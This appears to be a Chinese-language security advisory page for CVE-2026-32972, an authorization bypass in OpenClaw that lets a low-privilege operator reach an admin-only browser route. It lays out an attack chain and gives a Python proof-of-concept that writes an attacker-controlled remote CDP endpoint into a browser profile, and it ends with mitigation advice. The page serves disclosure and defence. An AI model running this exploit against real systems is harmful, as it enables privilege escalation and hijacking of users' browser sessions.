CVE-2026-32972 CVSS 7.1 高危

CVE-2026-32972 OpenClaw权限绕过漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32972

漏洞类型

权限绕过

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.11之前版本存在权限绕过漏洞。拥有低权限operator.write的操作员可利用browser.request接口访问管理员专用路由，成功绕过权限检查管理浏览器配置文件，并能将攻击者控制的远程CDP端点持久化写入磁盘，导致权限提升和数据完整性受损。

技术细节

该漏洞源于OpenClaw在处理浏览器配置文件管理请求时的权限校验逻辑缺陷。系统在关键API接口上仅检查用户是否具备基础的operator.write权限，而未严格验证是否拥有高阶的operator.admin权限，导致低权限操作员可越权访问管理员专属的browser.request路由。攻击者利用此缺陷可发送特制HTTP请求，创建或修改敏感的浏览器配置文件，并将恶意的远程CDP（Chrome DevTools Protocol）端点地址持久化存储至磁盘。这不仅完全绕过了系统设计的身份验证隔离机制，还允许攻击者通过注入的受控CDP端点远程接管浏览器会话，进而窃取敏感数据或执行后续攻击，严重破坏系统的完整性和可用性。

攻击链分析

STEP 1

步骤1：获取低权限凭证

攻击者注册或获取一个仅具备operator.write权限的OpenClaw操作员账户。

STEP 2

步骤2：发送越权请求

攻击者利用该账户向browser.request路由发送特制的HTTP请求，该请求本应仅限拥有operator.admin权限的用户访问。

STEP 3

步骤3：持久化恶意配置

通过请求参数，攻击者修改浏览器配置文件，将攻击者控制的远程CDP（Chrome DevTools Protocol）端点地址写入服务器磁盘。

STEP 4

步骤4：远程控制与数据窃取

当管理员或系统使用该被篡改的配置文件启动浏览器时，将连接到攻击者控制的CDP服务，导致会话被劫持或数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "http://vulnerable-openclaw-instance:8080"
username = "low_priv_user"
password = "user_password"

# 1. Authenticate and obtain session token
# The user only has 'operator.write' permissions
login_payload = {
    "username": username,
    "password": password
}

session = requests.Session()
login_resp = session.post(f"{target_host}/api/login", json=login_payload)

if login_resp.status_code == 200:
    print("[+] Login successful")
    # 2. Exploit the authorization bypass
    # Accessing admin-only route 'browser.request' to modify profiles
    exploit_payload = {
        "action": "update_profile",
        "profile_id": "default",
        # Persisting attacker-controlled remote CDP endpoint
        "remote_debugging_address": "http://attacker-controlled-cdn.com:9222"
    }
    
    # The vulnerable endpoint fails to check for 'operator.admin'
    exploit_url = f"{target_host}/api/browser.request"
    
    resp = session.post(exploit_url, json=exploit_payload)
    
    if resp.status_code == 200:
        print("[+] Exploit successful! Malicious CDP endpoint persisted.")
    else:
        print(f"[-] Exploit failed, status code: {resp.status_code}")
else:
    print("[-] Login failed")

影响范围

OpenClaw < 2026.3.11

防御指南

临时缓解措施

建议在升级补丁前，暂时禁用浏览器配置文件管理功能，或通过Web应用防火墙（WAF）拦截针对browser.request路由的非管理员请求，同时严格监控所有远程CDP连接行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表